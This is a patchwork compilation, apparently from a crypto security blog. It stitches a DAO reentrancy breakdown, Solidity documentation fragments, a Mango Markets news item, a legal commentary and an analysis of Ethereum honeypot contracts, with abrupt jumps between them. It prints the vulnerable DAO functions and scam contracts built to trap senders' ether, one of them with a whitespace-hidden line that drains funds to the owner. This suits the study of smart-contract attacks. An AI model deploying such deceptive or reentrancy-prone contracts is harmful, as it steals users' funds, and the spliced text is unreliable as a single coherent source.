Notice by the timestamps here that the attacker did this right around the time he started the malicious split, almost as an afterthought. I see this more as an unnecessary middle finger to the DAO than a financially viable attack: having already emptied virtually the entire DAO, going through this effort to pick up any pennies that might be left on the table is probably an attempt to demoralize holders into inaction. Many have concluded, and I agree, that this hints at the attacker’s motivations being a complete destruction of the DAO that goes beyond profit taking. While none of us know the truth here, I do recommend applying your own judgment.

Interestingly enough, this attack was described by Emin Gün Sirer after it had already occurred on the blockchain, but before the public had noticed.

Step 4: Executing the Split

So we’ve painstakingly described all the boring technical aspects of this attack. Let’s get to the fun part, the action: executing the malicious split. The account that executed the transactions behind the split is 0xf35e2cc8e6523d683ed44870f5b7cc785051a77d.

The child DAO they sent funds to is 0x304a554a310c7e546dfe434669c62820b7d83490. The proposal was created and initiated by account 0xb656b2a9c3b2416437a811e07466ca712f5a5b5a (you can see the call to createProposal in the blockchain history there).

Deconstructing the constructor arguments that created that child DAO leads us to a curator at 0xda4a4626d3e16e094de3225a751aab7128e96526. That smart contract is just a regular multisignature wallet, with most of its past transactions being adding/removing owners and other wallet management tasks. Nothing interesting there.

Johannes Pfeffer on Medium has an excellent blockchain-based reconstruction of the transactions involved in the malicious Child DAO. I won’t spend too much time on such blockchain analysis, since he’s already done a great job. I highly encourage anyone interested to start with that article.
In the next article in the series, we’ll look at the code from the malicious contract itself (containing the exploit that actually launched the recursive attack). In the interest of expedience of release, we have not yet completed such an analysis.

Step 4a: Extending the Split

This step is an update to the original update, and covers how the attacker was able to turn a ~30X amplification attack (due to the max size of Ethereum’s stack being capped at 128) to a virtually infinite draining account.

Savvy readers of the above may notice that, even after overwhelming the stack and executing many more malicious splits than was required, the hacker would have their balance zeroed out by the code at the end of splitDAO:

    function splitDAO(
      ....
      withdrawRewardFor(msg.sender); // be nice, and get his rewards
      totalSupply -= balances[msg.sender];
      balances[msg.sender] = 0;
      paidOut[msg.sender] = 0;
      return true;
    }

So how did the attacker get around this? Thanks to the ability to transfer DAO tokens, he didn’t really need to! All he had to do was call the DAO’s helpful transfer function at the top of his stack, from his malicious function:

    function transfer(address _to, uint256 _amount) noEther returns (bool success) {
        if (balances[msg.sender] >= _amount && _amount > 0) {
            balances[msg.sender] -= _amount;
            balances[_to] += _amount;
            ...

By transferring the tokens to a proxy account, the original account would be zeroed out correctly at the end of splitDAO (notice how if A transfers all its money to B, A’s account is already zeroed out by transfer before it can be zeroed out by splitDAO). The attacker can then send the money back from the proxy account to the original account and start the whole process again. Even the update to totalSupply in splitDAO is missed, since p.totalSupply[0] is used to calculate the payout, which is a property of the original proposal and only instantiated once before the attack occurs.
So the attack size stays constant despite less available ETH in the DAO with every iteration.

The evidence of two malicious contracts calling into withdrawRewardFor on the blockchain suggests that the attacker’s proxy account was also an attack-enabled contract that simply alternated as the attacker with the original contract. This optimization saves the attacker one transaction per attack cycle, but otherwise appears unnecessary.

Was 1.1 Vulnerable?

Because this vulnerability was in withdrawRewardFor, a natural question to ask is whether the DAO 1.1, with the updated function, was still vulnerable to a similar attack. The answer: yes. Check out the updated function (especially the marked lines):

    function withdrawRewardFor(address _account) noEther internal returns (bool _success) {
        if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account])
            throw;

        uint reward =
            (balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account];

        reward = rewardAccount.balance < reward ? rewardAccount.balance : reward;

        paidOut[_account] += reward; // XXXXX
        if (!rewardAccount.payOut(_account, reward)) // XXXXX
            throw;

        return true;
    }

Notice how paidOut is updated before the actual payout is made now. So how does this affect our exploit? Well, the second time getRewardFor is called, from inside the evil second call to splitDAO, this line:

    uint reward =
        (balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account];

will come out to 0. The payOut call will then call _recipient.call.value(0)(), which is the default value for that function, making it equivalent to a call to _recipient.call()

Because the attacker paid for a lot of gas when sending his malicious split transaction, the recursive attack is allowed to continue with a vengeance.

Realizing they needed a 1.2 6 days after a 1.1, on code designed to be secure for years, is probably why the DAO’s puppet masters called it quits.
An Important Takeaway

I think the susceptibility of 1.1 to this attack is really interesting: even though withdrawRewardFor was not vulnerable by itself, and even though splitDAO was not vulnerable without withdrawRewardFor, the combination proves deadly. This is probably why this exploit was missed in review so many times by so many different people: reviewers tend to review functions one at a time, and assume that calls to secure subroutines will operate securely and as intended.

In the case of Ethereum, even secure functions that involve sending funds could render your original function vulnerable to reentrancy, whether they’re functions from the default Solidity libraries or functions that you wrote yourself with security in mind. Special care is required in reviews of Ethereum code to make sure that any functions moving value occur after any state updates whatsoever, otherwise these state values will be necessarily vulnerable to reentrancy.

I won’t cover the fork debate or what’s next for Ethereum and The DAO here. That subject is being beaten to death on every form of social media imaginable.

For our series of posts, the next step is to reconstruct the exploit on the TestNet using the DAO 1.0 code, and demonstrate both the code behind the exploit and the mechanism of attack. Please note that if someone beats me to these objectives, I reserve the right to cap the length of the series at one.

Solidity

Solidity is an object-oriented, high-level language for implementing smart contracts. Smart contracts are programs that govern the behavior of accounts within the Ethereum state.

Solidity is a curly-bracket language designed to target the Ethereum Virtual Machine (EVM). It is influenced by C++, Python, and JavaScript. You can find more details about which languages Solidity has been inspired by in the :doc:`language influences <language-influences>` section.
Solidity is statically typed, supports inheritance, libraries, and complex user-defined types, among other features.

With Solidity, you can create contracts for uses such as voting, crowdfunding, blind auctions, and multi-signature wallets.

When deploying contracts, you should use the latest released version of Solidity. Apart from exceptional cases, only the latest version receives security fixes. Furthermore, breaking changes, as well as new features, are introduced regularly. We currently use a 0.y.z version number to indicate this fast pace of change.

Warning: Solidity recently released the 0.8.x version that introduced a lot of breaking changes. Make sure you read :doc:`the full list <080-breaking-changes>`.

Ideas for improving Solidity or this documentation are always welcome, read our :doc:`contributors guide <contributing>` for more details.

Hint: You can download this documentation as PDF, HTML or Epub by clicking on the versions flyout menu in the bottom-left corner and selecting the preferred download format.

Getting Started

1. Understand the Smart Contract Basics

If you are new to the concept of smart contracts, we recommend you to get started by digging into the “Introduction to Smart Contracts” section, which covers the following:

:ref:`A simple example smart contract <simple-smart-contract>` written in Solidity.
:ref:`Blockchain Basics <blockchain-basics>`.
:ref:`The Ethereum Virtual Machine <the-ethereum-virtual-machine>`.

2. Get to Know Solidity

Once you are accustomed to the basics, we recommend you read the :doc:`”Solidity by Example” <solidity-by-example>` and “Language Description” sections to understand the core concepts of the language.

3. Install the Solidity Compiler

There are various ways to install the Solidity compiler, simply choose your preferred option and follow the steps outlined on the :ref:`installation page <installing-solidity>`.

Hint: You can try out code examples directly in your browser with the Remix IDE.
Remix is a web browser-based IDE that allows you to write, deploy and administer Solidity smart contracts, without the need to install Solidity locally.

Warning: As humans write software, it can have bugs. Therefore, you should follow established software development best practices when writing your smart contracts. This includes code review, testing, audits, and correctness proofs. Smart contract users are sometimes more confident with code than their authors, and blockchains and smart contracts have their own unique issues to watch out for, so before working on production code, make sure you read the :ref:`security_considerations` section.

4. Learn More

If you want to learn more about building decentralized applications on Ethereum, the Ethereum Developer Resources can help you with further general documentation around Ethereum, and a wide selection of tutorials, tools, and development frameworks.

If you have any questions, you can try searching for answers or asking on the Ethereum StackExchange, or our Gitter channel.

Translations

Community contributors help translate this documentation into several languages. Note that they have varying degrees of completeness and up-to-dateness. The English version stands as a reference.

You can switch between languages by clicking on the flyout menu in the bottom-left corner and selecting the preferred language.

Chinese, French, Indonesian, Japanese, Korean, Persian, Russian, Spanish, Turkish

Note: We set up a GitHub organization and translation workflow to help streamline the community efforts. Please refer to the translation guide in the solidity-docs org for information on how to start a new language or contribute to the community translations.

Contents

Basic concepts

To start off, keep in mind that in Ethereum there are two types of accounts: (i) externally owned accounts controlled by humans and (ii) contract accounts controlled by code.
This is important because only contract accounts have associated code, and hence, can have a fallback function.

In Ethereum all the action is triggered by transactions or messages (calls) set off by externally owned accounts. Those transactions can be an ether transfer or the triggering of contract code. Remember, contracts can trigger other contracts’ code as well.

Smart contracts are written in high-level programming languages such as Solidity but for those contracts to be uploaded on the blockchain, they need to be compiled into bytecode, a low-level programming language executed by the Ethereum Virtual Machine (EVM). Said bytecode can be interpreted with opcodes.

When a contract calls or sends money to another contract that code compiles in the EVM bytecode, invoking the call function. But there is a difference: when calling another contract the call function provides specific function identifiers and data; however, when sending money to another contract, the call function has a set amount of gas but no data (case b below), and thus triggers the fallback function of the called contract.

The attack

The fallback function abuse played a very important role in the DAO attack. Let’s see what a fallback function is and how it can be used for malicious purposes.

Fallback function

A contract can have one anonymous function, also known as the fallback function. This function does not take any arguments and it is triggered in three cases [1]:

a. If none of the functions of the call to the contract match any of the functions in the called contract
b. When the contract receives ether without extra data
c. If no data was supplied

Example

The following is sample code for a contract vulnerable to a malicious fallback function of another contract. In this example we have two contracts: (i) the contract Bank (vulnerable contract) and (ii) the contract BankAttacker (malicious contract).
Imagine that the contract Bank is the DAO smart contract but much more simplified and the contract BankAttacker is the hacker’s malicious smart contract that emptied the DAO.

The hacker initiates the interaction with contract Bank through its malicious contract and the sequence of the actions is as follows:

1. The first thing the hacker does is send ether (75 wei) to the vulnerable contract through the deposit function of the malicious contract. This function calls the addToBalance function of the vulnerable contract.
2. Then, the hacker withdraws, through the withdraw function of the malicious contract, the same amount of wei (75), triggering the withdrawBalance function of the vulnerable contract.
3. The withdrawBalance function first sends ether (75 wei) to the malicious contract, triggering its fallback function, and last updates the userBalances variable (that this piece is done last is very important for the attack).
4. The malicious fallback function calls the withdrawBalance function again (recursive call), doubling the withdraw, before the execution of the first withdrawBalance function finishes, and thus, without updating the userBalances variable.

In this example, there are only two recursive calls to the withdrawBalance function so the hacker ends up with a balance of 150 wei. They took more than they should (75 wei) because the userBalances variable is the last thing set/updated.

One important point is that unlike the JavaScript’s blocks of code, the EVM executes instructions synchronously, one after the other, and this is why the userBalances variable is updated only after the previous code is finished.

The following is a more graphic explanation of the example. The instances referred to in this graphic are the different states of the contracts saved in the blockchain.

In the graphic you will see that the hacker, through his/her/their external account, triggers the malicious contract, so this contract can interact with the vulnerable contract.
Last, here is the example in JavaScript, just in case you are not very familiar with Solidity yet.

The hacker stole over $100 million in crypto from the Mango Markets Exchange on Tuesday, and may get to keep almost half of it.

Mango DAO has offered a deal to the thief who made off with $100 million in crypto from an exploit in the Mango Markets platform earlier this week—a way to avoid a criminal investigation and pay off bad debt.

The Mango DAO, a decentralized autonomous organization that manages Mango Markets, has offered the hacker a bug bounty of $47 million, meaning that the thief would be required to send back $67 million worth of tokens under the terms of the deal.

“We are seeking to make users whole to the extent possible,” the Mango DAO proposal says, addressing the thief.

On Tuesday, a hacker was able to steal over $100 million through an exploit in the Mango Markets Solana DeFi exchange. The attacker temporarily drove up the value of their collateral and then took out loans from the Mango treasury.

The DAO is a so-called Decentralized Autonomous Organization (“DAO”). DAOs run through rules encoded as smart contracts, which in turn are computer programs that facilitate, verify, or enforce the negotiation or performance of a contract, or that make a contractual clause unnecessary. In simple terms, think of any contract between two parties that gets translated into code, so it doesn’t need any external action but does automatically what was agreed. Smart Contracts are a pretty revolutionary and powerful concept by itself and if you want to know more about it, read our separate post on the subject.

The idea of a DAO somewhat is that once launched it can run based on its underlying smart contracts alone.
The DAO’s smart contracts are based on Ethereum, a public blockchain (which is a distributed database – for more information on blockchain, see here) platform with programmable transaction functionality that is also the basis for ether (or ETH), a cryptocurrency. ETH is a cryptocurrency similar to Bitcoin, but very popular since it offers a wider range of services and is therefore sometimes considered a considerable challenger of Bitcoin as the leading cryptocurrency.

The DAO is fuelled using ether, which creates DAO tokens. DAO token holders will have the right to vote on investment proposals (proportional to the number of tokens held) as well as the opportunity to receive rewards generated by the output of the work from the contractors’ proposals. Since it is a decentralized autonomous organization that is represented only by its smart contracts, it has no physical address and people only interact as contractors or curators, but not in managerial roles in the traditional sense. However, it is supported by a limited company and a cryptocurrency exchange in Switzerland, both chosen with a view to the legal and regulatory framework.

The DAO is intended as a form of venture capital vehicle that would invest in projects in the sharing economy. Prior to the attack, the fund’s value was around $150 million in ether.

So while its creators hoped to build a more democratic financial institution that would be safe against the fallibility of humans by trusting the trustless concept of the blockchain and smart contracts, it seems human error is at the bottom of the heist.

Though it is not entirely certain yet how the money has been stolen, it appears that the hacker exploited a programming mistake in the code of the DAO. Weaknesses in the code had already been highlighted before and experts in the field had already called to fix critical problems.
At this point it is important to recall that as a blockchain-enabled organization, the DAO is completely transparent and everything is done by the code, which anyone can see and audit. So, it seems that what happened – in a very simplified way – was that the hacker sent repeated transaction requests to transfer funds to a DAO clone. Because of the programming error, the system possibly did not immediately update the balance, allowing the attacker to drain the account.

Since then the discussion has been how to respond to the attack. In an initial response, Vitalik Buterin, one of Ethereum’s founders, publicly asked online currency exchanges to suspend trading of ether and DAO tokens as well as deposits and withdrawals of the cryptocurrency.

Because a restriction in the code delays pay-outs for at least one week, possibly even longer, the hacker will not be able to access the funds, which gives The DAO community some time. Several options are currently discussed: The community could decide to do nothing, preserve the system and let the DAO token holders lose their investment. Or the so-called “hard-fork” where the Ethereum community could decide to roll back all transactions to a specific point in time before the attack. Or the network could be updated to ensure that all transactions from the hacker’s ether address are blocked, basically freezing the account and trying to exploit a similar programming error to “steal” the money back since the DAO clone is likely to contain the same code structure that made the original attack possible.

Regardless of which course is decided on, what are the likely consequences for the DAO, Ethereum and the Blockchain in general after this incident?

Stephen Tual, COO of Slock.it, the company that had worked on the development of The DAO, stated that The DAO is definitely going to close. Whether that is the case is to be seen as in a leaderless organization no one person alone can decide on the fate of the organisation.
The future of the investment vehicle is cast into serious doubt in any case by the theft itself, as it is questionable whether anyone would put money in a construction that has a proven vulnerability even when its makers promise to fix the issues. Trust, after all, is relevant even for a trustless concept when it comes to money.

The more damaging aspect for the DAO, but also for Ethereum and potentially even the blockchain technology, lies potentially in the actions to get the ether back. In comments across the web it has been compared with a bailout for banks that are too big to fail and that investors simply didn’t understand the risks of their investments.

If the system is supposed to be flawless and safe against tampering, isn’t meddling with it because of an, albeit very significant and expensive, programming error, undermining the whole idea? If people decide on whether transactions are to be reversed or not instead of the underlying smart contract, what is the worth of such an instrument if it’s only useful if everything goes according to plan?

Regardless of what happens next, it is an immensely important case as well from a legal and regulatory perspective: One tweet even hinted that a short bet on Ether was placed on one cryptocurrency exchange shortly before the attack, which reminds us that traditional regulatory aspects like Market Abuse are more than relevant in the digital age. The tweet demanded an investigation though that raises the interesting questions about jurisdiction, governing legal frameworks and regulation, but that is only a side aspect to the story for now (though it would make sense from an economical perspective since the thief is unlikely to be able to access the Ether he stole and in that way could gain a monetary benefit from the heist).

In an interesting post at Coindesk, a US lawyer discussed the incident from a perspective of criminal law (Theft? Yes!), civil law (sue the hacker? Sure, seems everything can be sued) and tort law.
And even more interesting is the question whether the hacker only exploited a loophole in the code. In a message to the DAO and the Ethereum community, which is allegedly from the person responsible for the attack, the hacker described his action simply as using an intentional feature of the code and stated that any action to get the funds back would amount to “seizure of my legitimate and rightful ether, claimed legally through the terms of a smart contract”, and threatened legal action against anyone trying to do so.

Everything is in flux: at the time of writing this, the DAO community is voting on whether to take action and, if so, in what form. Someone claiming to be an intermediary on behalf of the attackers has published a note, making it look like they’re holding the stolen ether ransom, and tweets on the subject get seemingly posted every second.

So to summarise, plenty of open questions, an uncertain future for the DAO, but maybe there is a silver lining that comes from this. Maybe this is only a costly episode on a steep learning curve, similar to other forms of innovation, and maybe this will lead to more care, diligence and scrutiny in future blockchain projects, which in the end might not be so bad after all.

Literature: Understanding a Revolutionary and Flawed Grand Experiment in Blockchain: The DAO Attack, Journal of Cases on Information Technology

Conclusion

I’ve learned a lot understanding the DAO exploit, mainly that programming smart contracts is not an easy task and it should be done rigorously. I still have lots of unsolved questions such as: Do we need fallback functions at all? Apparently this was fixed in the new version of Solidity. However, the problem is still present at the EVM level because a hacker can program in opcode and avoid the Solidity’s security

Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/-QDYiKCwOaA
Source: https://cryptodeeptech.ru/dao-exploit

Cryptanalysis
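The Bank / BankAttacker sequence walked through in the post above, as an added JavaScript model that is not part of the original post: it runs the same deposit and withdraw steps against the vulnerable ordering (send, then update userBalances) and the hardened ordering (update, then send), and checks the solvency invariant a reviewer or test suite would assert. Chain, runScenario, the honest depositor "alice" and her 300 wei are assumptions made for the illustration; transaction revert is not modelled.

```javascript
// Added illustration. Minimal model of value transfers that trigger the
// receiver's fallback function. All class and function names are hypothetical.
class Chain {
  constructor() { this.eth = new Map(); this.code = new Map(); }
  balance(addr) { return this.eth.get(addr) || 0; }
  credit(addr, wei) { this.eth.set(addr, this.balance(addr) + wei); }
  deploy(addr, contract) {
    contract.address = addr;
    contract.chain = this;
    this.code.set(addr, contract);
    return contract;
  }
  // Transfer with empty data: move the wei, then run the receiver's fallback
  // (case b in the post: ether received without extra data).
  send(from, to, wei) {
    if (this.balance(from) < wei) throw new Error("insufficient funds");
    this.eth.set(from, this.balance(from) - wei);
    this.credit(to, wei);
    const target = this.code.get(to);
    if (target && typeof target.fallback === "function") target.fallback(from, wei);
  }
}

class Bank {
  constructor(hardened) { this.hardened = hardened; this.userBalances = new Map(); }
  owed(user) { return this.userBalances.get(user) || 0; }
  addToBalance(sender, wei) {
    this.chain.send(sender, this.address, wei);
    this.userBalances.set(sender, this.owed(sender) + wei);
  }
  withdrawBalance(sender) {
    const amount = this.owed(sender);
    if (this.hardened) {
      // State update first, external call last: a re-entrant call reads 0.
      this.userBalances.set(sender, 0);
      this.chain.send(this.address, sender, amount);
    } else {
      // External call first: the receiver's fallback runs while
      // userBalances still holds the old value.
      this.chain.send(this.address, sender, amount);
      this.userBalances.set(sender, 0);
    }
  }
  // Invariant to assert in tests: ether held covers everything owed.
  isSolvent() {
    let liabilities = 0;
    for (const wei of this.userBalances.values()) liabilities += wei;
    return this.chain.balance(this.address) >= liabilities;
  }
}

// Stand-in for the post's BankAttacker: its fallback re-enters withdrawBalance
// a bounded number of times.
class BankAttacker {
  constructor(bank, reentries) { this.bank = bank; this.reentriesLeft = reentries; }
  deposit(wei) { this.bank.addToBalance(this.address, wei); }
  withdraw() { this.bank.withdrawBalance(this.address); }
  fallback() {
    if (this.reentriesLeft > 0) {
      this.reentriesLeft -= 1;
      this.bank.withdrawBalance(this.address);
    }
  }
}

// Runs the four steps from the post and reports the final balances in wei.
function runScenario(hardened, reentries) {
  const chain = new Chain();
  const bank = chain.deploy("bank", new Bank(hardened));
  const attacker = chain.deploy("attacker", new BankAttacker(bank, reentries));
  chain.credit("alice", 300);      // constructed honest depositor
  chain.credit("attacker", 75);    // the 75 wei from the post
  bank.addToBalance("alice", 300);
  attacker.deposit(75);
  attacker.withdraw();
  return {
    attacker: chain.balance("attacker"),
    bank: chain.balance("bank"),
    owedToAlice: bank.owed("alice"),
    solvent: bank.isSolvent(),
  };
}

console.log("vulnerable:", runScenario(false, 1));
console.log("hardened:  ", runScenario(true, 1));
```

With one re-entry (two calls to withdrawBalance in total) the vulnerable ordering pays out the 150 wei the post describes and leaves the bank unable to cover the other depositor; the hardened ordering pays exactly 75.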
  11. CRYPTO DEEP TECH

Following the article: “Solidity Forcibly Send Ether Vulnerability to a Smart Contract continuation of the list of general EcoSystem security from attacks”. In this article, we will continue this topic related to vulnerabilities and traps. In the process of cryptanalysis of various cryptocurrencies, we are increasingly getting loopholes and backdoors.

Honeypots work by luring attackers with a balance stored in the smart contract, and what appears to be a vulnerability in the code. Typically, to access the funds, the attacker would have to send their own funds, but unbeknownst to them, there is some kind of recovery mechanism allowing the smart contract owner to recover their own funds along with the funds of the attacker.

Let’s look at a couple of different real-world examples:

    pragma solidity ^0.4.18;

    contract MultiplicatorX3 {
        address public Owner = msg.sender;

        // Accepts plain ether transfers.
        function() public payable{}

        // Owner-only: sends the whole contract balance to the owner.
        function withdraw() payable public {
            require(msg.sender == Owner);
            Owner.transfer(this.balance);
        }

        // Owner-only: arbitrary call with attached value.
        function Command(address adr,bytes data) payable public {
            require(msg.sender == Owner);
            adr.call.value(msg.value)(data);
        }

        // The bait: callable by anyone.
        function multiplicate(address adr) public payable {
            if(msg.value>=this.balance) {
                adr.transfer(this.balance+msg.value);
            }
        }
    }

In this contract, it seems that by sending more than the contract balance to multiplicate(), you can set your address as the contract owner, then proceed to drain the contract of funds. However, although it seems that this.balance is updated after the function is executed, it is actually updated before the function is called, meaning that multiplicate() is never executed, yet the attacker’s funds are locked in the contract.
    pragma solidity ^0.4.19;

    contract Gift_1_ETH {
        bool passHasBeenSet = false;

        function() payable {}

        function GetHash(bytes pass) constant returns (bytes32) { return sha3(pass); }

        bytes32 public hashPass;

        // Overwrites hashPass only while passHasBeenSet is still false.
        function SetPass(bytes32 hash) public payable {
            if (!passHasBeenSet && (msg.value >= 1 ether)) {
                hashPass = hash;
            }
        }

        function GetGift(bytes pass) external payable {
            if (hashPass == sha3(pass)) {
                msg.sender.transfer(this.balance);
            }
        }

        // Locks hashPass for good once called with the current hash.
        function PassHasBeenSet(bytes32 hash) public {
            if (hash == hashPass) {
                passHasBeenSet = true;
            }
        }
    }

This contract is especially sneaky. So long as passHasBeenSet is still set to false, anyone could GetHash(), SetPass(), and GetGift(). The sneaky part of this contract is that the last sentence is entirely true, but the problem is that passHasBeenSet is already set to true, even though it’s not in the etherscan transaction log.

You see, when smart contracts make transactions to each other they don’t appear in the transaction log; this is because they perform what’s known as a message call and not a transaction. So what happened here must have been some external contract setting the pass before anyone else could.

A safer method the attacker should have used would have been to check the contract storage with a security analysis tool.

Hardly a week passes without large scale hacks in the crypto world. It’s not just centralised exchanges that are targets of attackers. Successful hacks such as the DAO, Parity1 and Parity2 have shown that vulnerabilities in smart contracts can lead to losing digital assets worth millions of dollars. Attackers are driven by making profits and with the incredible value appreciation in 2017 in the crypto world, individuals and organisations who hold or manage digital assets are often vulnerable to attacks.
Smart contracts especially have become a prime target for attackers for the following reasons:

Finality of transactions: This is a special property of blockchain systems and it means that once a transaction (or state change) took place it can’t be taken back, or at least not without grave consequences, which in case of the DAO hack led to a hard fork. For an attacker targeting smart contracts, finality is a great property since a successful attack can not easily be undone. In traditional banking systems this is quite different: an attack, even though initially successful, could be stopped and any transactions could be rolled back if noticed early enough.

Monetising successful attacks is straightforward: Once the funds of a smart contract can be withdrawn to an attacker’s account, transferring the funds to an exchange and cashing out in Fiat while concealing one’s identity is something that the attackers can get away with if they are careful enough.

Availability of contract source code / byte code: Ethereum is a public blockchain and so at least the byte code of a smart contract is available to anyone. Blockchain explorers such as Etherscan also allow source code to be attached to a smart contract, giving potential attackers access to high level Solidity code.

Since we have established now why attackers find smart contracts attractive targets, let’s further look into the circumstances that could decide if a smart contract gets attacked:

Balance: The greater the balance of a smart contract the more attackers will try to attack it and the more time they are willing to spend to find a vulnerability. This is an easier economic equation than for non-smart-contract targets since the balance that can be potentially stolen is public and attackers have certainty on how profitable a successful attack could be.

Difficulty/Time: This is the unknown variable in the equation.
Yet the approach to look for potential targets can be automated by using smart contract vulnerability scanners. Availability of source code additionally decreases analysis time while also lowering the bar for potential attackers to hack smart contracts since byte code is harder to read and therefore it takes more skill and time to analyse.

Taking the two factors above into consideration, one could assume that every smart contract published to the main net with a sufficient balance is analysed automatically by scanners and/or manually by humans for vulnerabilities and is likely going to be exploited if it is in fact vulnerable. The economic incentives and the availability of smart contracts on the public chain have given rise to a very active group of attackers, trying to steal from vulnerable smart contracts. Among this larger group of attackers, a few seem to have specialised to hack the hackers by creating seemingly vulnerable smart contracts. In many ways these contracts have resemblance to honeypot systems. They are created to lure attackers with the following properties:

Balance: Honeypots are created with an initial balance that often seems to be in the range of 0.5–1.0 ETH.

Vulnerability: A weakness in the code that seemingly allows an attacker to withdraw all the funds.

Recovery Mechanism: Allows owner to reclaim the funds including the funds of the attacker.

Let’s analyse three different types of smart contract honeypots that I have come across over the last couple of weeks.

honeypot1: Multiplicator.sol

The contract’s source code was published on Etherscan with a seemingly vulnerable function. Try to spot the trap.

This is a really short contract and the multiplicate() function is the only function that does allow a call from anyone other than the owner of the contract. At first glance it looks like by transferring more than the current balance of the contract it is possible to withdraw the full balance.
Both statements in line 29 and 31 try to reinforce the idea that this.balance is somehow credited after the function is finished. This is a trap since the this.balance is updated before the multiplicate() function is called and so if(msg.value>=this.balance) is never true unless this.balance is initially zero.

It seems that someone has actually tried to call multiplicate() with 1.1 Ether. Shortly after, the owner has withdrawn the full balance.

honeypot2: Gift_1_ETH.sol

The contract has a promising name; if you want to figure out the trap yourself have a look at the code here. Also check out the transaction log … why did 0xc4126a64c546677146FfB3f3D5A6F6d5A2F94DF1 lose 1 ETH?

It seems that 0xc4126a64c546677146FfB3f3D5A6F6d5A2F94DF1 did everything right. First SetPass() was called to overwrite hashPass and then GetGift() to withdraw the Ether. Also the attacker made sure PassHasBeenSet() has not been called. So what went wrong?

One important piece of information in order to understand honeypot2 is to clarify what internal transactions are. They actually do not exist according to the specifications in the Ethereum Yellow Paper (see Appendix A for terminologies). Transactions can only be sent by External Actors to other External Actors or non-empty associated EVM Code accounts or what is commonly referred to as smart contracts. If smart contracts exchange value between each other then they perform a Message Call, not a Transaction. The terminology used by EtherScan and other blockchain explorers can be misleading.

It’s interesting how one takes information as a given truth if the data comes from a familiar source. In this case EtherScan does not show the full picture of what happened. The assumption is that the transaction (or message call) should show up in the internal transactions tab but it seems that calls from other contracts that have msg.value set to zero are not listed currently.
Etherchain on the other hand shows the transaction (or message call) that called PassHasBeenSet() with the correct hash and so denying any future password reset. The attacker (in this case more of a victim) could have also been more careful and actually read the contract storage with Mythril for instance. It would have been apparent that passHasBeenSet is already set to true.

honeypot3: TestToken

I have taken the trick from the honeypot contract WhaleGiveaway1 (see analysis) and combined it with one of my own ideas. The contract is available here on my Github. Something is missing here …

This contract relies on a very simple yet effective technique. It uses a lot of whitespaces to push some of the code to the right and out of the immediate visibility of the editor if horizontal scrolling is enabled (WhaleGiveaway1). When you try this locally in Remix and you purely rely on the scrolling technique like in WhaleGiveaway1 then the trick actually does not work. It would be effective if an attacker copies the code and is actually able to exploit the issue locally but then fails on the main net. This can be done using block numbers. Based on what network is used the block numbers vary significantly from the main net.

Ganache: starts from 0
Testrpc: starts from 1150000
Ropsten: a few weeks ago around 2596174
Main net: a few weeks ago around 5040270

Therefore the first if statement is only true on the main net and transfers all ETH to the owner. On the other networks the “invisible” code is not executed.

    if (block.number > 5040270 ) {if (_owner == msg.sender ){_owner.transfer(this.balance);} else {throw;}}

EtherScan also had the horizontal scrolling enabled, but they deactivated it a few weeks ago.

TL;DR

Smart contract honeypot authors form a very interesting sub culture among a larger group of hackers trying to profit from vulnerable smart contracts. In general I would like to give anyone the following advice:

Be careful where you send your ETH, it could be a trap.
Be nice and don’t steal from people.

I have created a Github repo for honeypot smart contracts here. Should you have any honeypot contracts yourself that you want to share, please feel free to push them to the repo or share them in the comments.

https://cryptodeep.ru/doc/The_Art_of_The_Scam_Demystifying_Honeypots_in_Ethereum_Smart_Contracts.pdf

Honeypot programs are one of the best tools that security researchers have ever made to study new or unknown hacking techniques used by attackers. Therefore, using honeypots in smart contracts could be a very good idea to study those attacks. So what is a honeypot in a smart contract?

A honeypot in the blockchain industry is an intentionally vulnerable smart contract that was made to push attackers to exploit its vulnerability. The idea is to convince attackers or even simple users to send a small portion of cryptocurrency to the contract to exploit it, then lock those ethers in the contract.

In this blog post, you are going to see some examples of those honeypots with a detailed technical explanation of how they work. So if you are interested in learning more about this subject, just keep reading and leave a comment at the end.

What is a honeypot in a smart contract?

A honeypot is a smart contract that purports to leak cash to an arbitrary user due to a clear vulnerability in its code, in exchange for extra payments from that user. The money paid by the user to the vulnerable contract is then locked in the contract, and only the honeypot designer or attacker will be able to recover it.

The concept of a honeypot is well known in the field of network security and was used for years by security researchers. The main objective of using them was to identify new or unknown exploits or techniques already used in the wild. In addition, honeypots were used to identify zero-day vulnerabilities and report them to vendors. This technique was basically designed to trap black hat hackers and learn from them.
However, with the rise of Blockchain technology and the smart contract concept, black hat hackers started to use this concept to trap users with both good and bad intentions. The idea is simple: the honeypot designer creates a smart contract and puts a clear vulnerability in it. He then hides malicious code in the smart contract or between its transactions to block the correct execution of the withdraw function. Then he deploys the contract and waits for other users to get into the trap.

Blockchain is the new trending technology in the market, and many companies have started to implement it to solve multiple problems. Usually, this technology manages different types of user information related to their money. Therefore, to secure this technology you should first understand how it works. Blockchain technology can be seen as a 6-layer system whose layers work together. So what are the six layers of blockchain technology? Blockchain technology is built upon 6 main layers:

The TCP/IP network
Peer-to-Peer protocols
Consensus algorithms
Cryptography algorithms
Execution (Data blocks, Transactions, …)
Applications (Dapps, smart contracts …)

Best 10 Solidity smart contract audit tools that both developers and auditors use during their audits:

Slither
Securify
SmartCheck
Oyente
Mythril
ContractFuzzer
Remix IDE static analysis plug-in
Manticore
sFuzz
MadMax

What actually makes this concept even more dangerous in the context of blockchain is that implementing a honeypot is not really difficult and does not require advanced skills. In fact, any user can implement a honeypot in the blockchain; all it takes is the fees to deploy such a contract. In fact, in the blockchain, the word “attacker” could be given both to the one who deploys the smart contract honeypot and to the one trying to exploit it (depending on his intention).
Therefore, in the following sections of this blog post, we will use the word “deployer” for the one who implements the honeypot and “user” for the one trying to exploit that smart contract.

What are the types of smart contract honeypots?

Honeypots in smart contracts can be divided into 3 main categories depending on the techniques used:

EVM based smart contract honeypots
Solidity compiler-based smart contract honeypots
Etherscan based smart contract honeypots

The main idea of a honeypot in the network context is to supervise an intentionally vulnerable component to see how it can be exploited by hackers. However, in a smart contract the main idea is to hide a behavior from users and trick them into sending ether in order to gain more through exploiting the vulnerability.

Six things you should do to prevent using components with known vulnerabilities:

Use components from official repositories
Remove unused components
Only accept components with active support
Put a vulnerability management system in place for your components
Put in place a components firewall
Remove or replace components whose support has stopped

Therefore, what actually defines each smart contract honeypot category is the technique used to hide that information from users.

